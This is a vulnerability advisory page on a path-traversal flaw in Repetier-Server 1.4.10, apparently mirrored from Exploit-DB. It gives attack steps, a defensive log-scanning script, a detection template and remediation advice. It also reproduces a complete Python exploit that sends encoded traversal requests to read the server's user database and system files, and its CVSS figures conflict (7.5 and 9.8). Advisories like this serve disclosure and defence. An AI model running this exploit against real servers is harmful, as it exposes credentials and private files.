[webapps] Repetier-Server 1.4.10 - Path Traversal
CVE-2026-26335
Repetier-Server 1.4.10 contains a path traversal vulnerability that allows arbitrary files to be read.
High · CVSS 7.5

📋 Basic Vulnerability Information

| CVE | CVE-2026-26335 |
|---|---|
| Vulnerability type | Path traversal |
| Affected version | Repetier-Server 1.4.10 |
| Severity | High · CVSS 7.5 |
| Published | 2026-04-30 |
| Submitter | Mohammed Idrees Banyamer |
| Source | Exploit-DB original ↗ |
🔬 Root Cause
The file request handler does not effectively filter the path parameter, so an attacker can use `../` sequences to access files outside the restricted directory.
🎯 Attack Scenario
1. The attacker confirms that the target is running Repetier-Server 1.4.10;
2. Constructs a URL containing `../`, such as http://target/printer/../../etc/passwd;
3. Sends the request;
4. The server returns the contents of /etc/passwd.
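As an added defender's example (not part of the original advisory or of any Repetier-Server code), the following Python scans web-server access log lines for the request shape described in the scenario above, and also catches the encoded-backslash form `..%5c` used by the published PoC and double-encoded variants. The log lines, IP addresses and the combined log format are constructed for illustration.

```python
"""Flag path-traversal attempts against a Repetier-Server web front end in access logs.

Added defensive example, not part of the original advisory. The log lines are
constructed (combined log format assumed) to mirror the request shapes in the
attack scenario, including the encoded-backslash form '..%5c' used by the PoC.
"""
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample access log (combined log format assumed).
SAMPLE_LOG = """\
10.0.0.5 - - [30/Apr/2026:10:00:01 +0000] "GET /printer/../../etc/passwd HTTP/1.1" 200 1843 "-" "curl/8.0"
10.0.0.7 - - [30/Apr/2026:10:00:02 +0000] "GET /views..%5c..%5c..%5cWindows%5cwin.ini/base/connectionLost.php HTTP/1.1" 200 403 "-" "python-requests/2.31"
10.0.0.9 - - [30/Apr/2026:10:00:03 +0000] "GET /base/connectionLost.php?file=%252e%252e%255cWindows%255cwin.ini HTTP/1.1" 404 0 "-" "python-requests/2.31"
10.0.0.2 - - [30/Apr/2026:10:00:04 +0000] "GET /printer/list HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.3 - - [30/Apr/2026:10:00:05 +0000] "GET /static/app..js HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
# A '..' followed by a separator (or the end of the string) is a parent-directory
# step; a name such as 'app..js' is not.
TRAVERSAL_RE = re.compile(r"\.\.(?:[/\\]|$)")


def normalize_request_path(raw_path: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable (catches double encoding), then fold '\\' to '/'."""
    path = raw_path
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def is_traversal_attempt(raw_path: str) -> bool:
    """True if the request path (query string included) contains a '..' step after decoding."""
    return TRAVERSAL_RE.search(normalize_request_path(raw_path)) is not None


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return one record per suspicious request, marking likely successful reads."""
    hits: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path")
        if not is_traversal_attempt(path):
            continue
        status, size = m.group("status"), m.group("size")
        hits.append({
            "ip": m.group("ip"),
            "timestamp": m.group("ts"),
            "path": path,
            "normalized": normalize_request_path(path),
            "status": int(status),
            # A 200 with a non-empty body is what the PoC itself treats as success.
            "likely_success": status == "200" and size not in ("-", "0"),
        })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        flag = "LIKELY READ" if hit["likely_success"] else "attempt"
        print(f'{hit["timestamp"]} {hit["ip"]:<10} {flag:<12} {hit["normalized"]}')
```

Decoding until the string is stable matters because a single `unquote` would leave `%252e%252e` as `%2e%2e` and miss it; the status and size fields separate a blocked attempt from a response that actually returned a file body, which is the case that needs incident response rather than just blocking.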
💥 Impact
An attacker can read arbitrary files on the server, leading to disclosure of sensitive information (such as configuration files and password files) and potentially widening the attack surface.
⚔️ Original PoC
The original PoC sends a request of the form `GET /printer/../../etc/passwd HTTP/1.1`, using path traversal to bypass file access restrictions and read sensitive system files.
```python
# Exploit Author: Mohammed Idrees Banyamer
# Advisory: https://cybir.com/2023/cve/poc-repetier-server-140/ (related research)
# CVSS: 9.8 (Critical) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
import requests
import argparse
import sys
from urllib.parse import urljoin


def generate_traversal(depth: int = 15) -> str:
    return "..%5c" * depth


def attempt_read(target_url: str, file_path: str, traversal_depth: int = 15, timeout: int = 10) -> bool:
    traversal = generate_traversal(traversal_depth)
    payloads = [
        f"views{traversal}{file_path}/base/connectionLost.php",
        f"base/connectionLost.php?file={traversal}{file_path}",
    ]
    print(f"[*] Targeting: {target_url}")
    print(f"[*] Attempting to read: {file_path}")
    print(f"[*] Traversal depth: {traversal_depth}")
    for payload in payloads:
        exploit_url = urljoin(target_url.rstrip("/") + "/", payload)
        try:
            print(f" → Trying: {exploit_url}")
            r = requests.get(exploit_url, timeout=timeout, verify=False)
            if r.status_code == 200 and len(r.content) > 60:
                sample = r.text[:500].replace("\n", " ").strip()
                print(f"[+] LIKELY SUCCESS (status {r.status_code}, {len(r.content)} bytes)")
                print(f" Preview:\n {sample}...")
                return True
            else:
                print(f" → Failed (status {r.status_code}, size {len(r.content)})")
        except requests.RequestException as e:
            print(f" → Error: {e}")
    return False


def main():
    parser = argparse.ArgumentParser(
        description="CVE-2026-26335 PoC - Repetier-Server Path Traversal / LFI"
    )
    parser.add_argument("target", help="Target base URL (e.g. http://192.168.1.100:3344/)")
    parser.add_argument("--file", default="ProgramData\\Repetier-Server\\database\\user.sql",
                        help="File path to read (use Windows \\ separator)")
    parser.add_argument("--depth", type=int, default=15, help="Traversal depth")
    parser.add_argument("--test", action="store_true", help="Quick test with Windows\\win.ini")
    args = parser.parse_args()
    if args.test:
        args.file = "Windows\\win.ini"
        print("[i] Running test mode → targeting Windows\\win.ini")
    file_path = args.file.replace("\\", "%5c")
    print("=" * 70)
    print("CVE-2026-26335 Exploit PoC - Repetier-Server <=1.4.10 Path Traversal")
    print("USE ONLY ON SYSTEMS YOU OWN OR HAVE EXPLICIT PERMISSION TO TEST!")
    print("=" * 70, "\n")
    success = attempt_read(args.target, file_path, args.depth)
    if not success:
        print("\n[!] Exploitation attempt failed.")
        print("Suggestions:")
        print(" • Increase --depth (try 18–30)")
        print(" • Verify target is running Repetier-Server <=1.4.10")
        print(" • Try alternative interesting files:")
        print(" - ProgramData%5cRepetier-Server%5cconfig.xml")
        print(" - Windows%5csystem32%5cdrivers%5cetc%5chosts")


if __name__ == "__main__":
    main()
```

🔍 Nuclei Detection Template
The following detection template can be used to determine whether a target is affected:

```yaml
id: CVE-2026-26335-detection
info:
  name: Repetier-Server 1.4.10 - Path Traversal Detection
  author: your-name
  severity: high
  description: |
    Repetier-Server version 1.4.10 and below are vulnerable to a path traversal attack.
    This template detects the potential vulnerability by checking the server version.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-26335
  tags: cve,cve2026,repetier,path-traversal
http:
  - method: GET
    path:
      - '{{BaseURL}}/version'
      - '{{BaseURL}}/api/info'
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Repetier-Server'
        part: body
      - type: regex
        part: body
        regex:
          - 'Repetier-Server[\/ ]+([0-9]+\.[0-9]+\.[0-9]+)'
      - type: status
        status:
          - 200
    extractors:
      - type: regex
        group: 1
        regex:
          - 'Repetier-Server[\/ ]+([0-9]+\.[0-9]+\.[0-9]+)'
        part: body
```

🛡️ Remediation
Upgrade to Repetier-Server 1.4.11 or later. Interim measures: block `../` path access at the web server layer and normalize user input before it is used to locate a file.
📎 References
- https://www.exploit-db.com/exploits/52686
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26335
- Exploit-DB original article
⚠️ This article is based on public vulnerability databases and is intended only for security research and defensive reference. Generated: 2026-05-07 05:37 | Source: Exploit-DB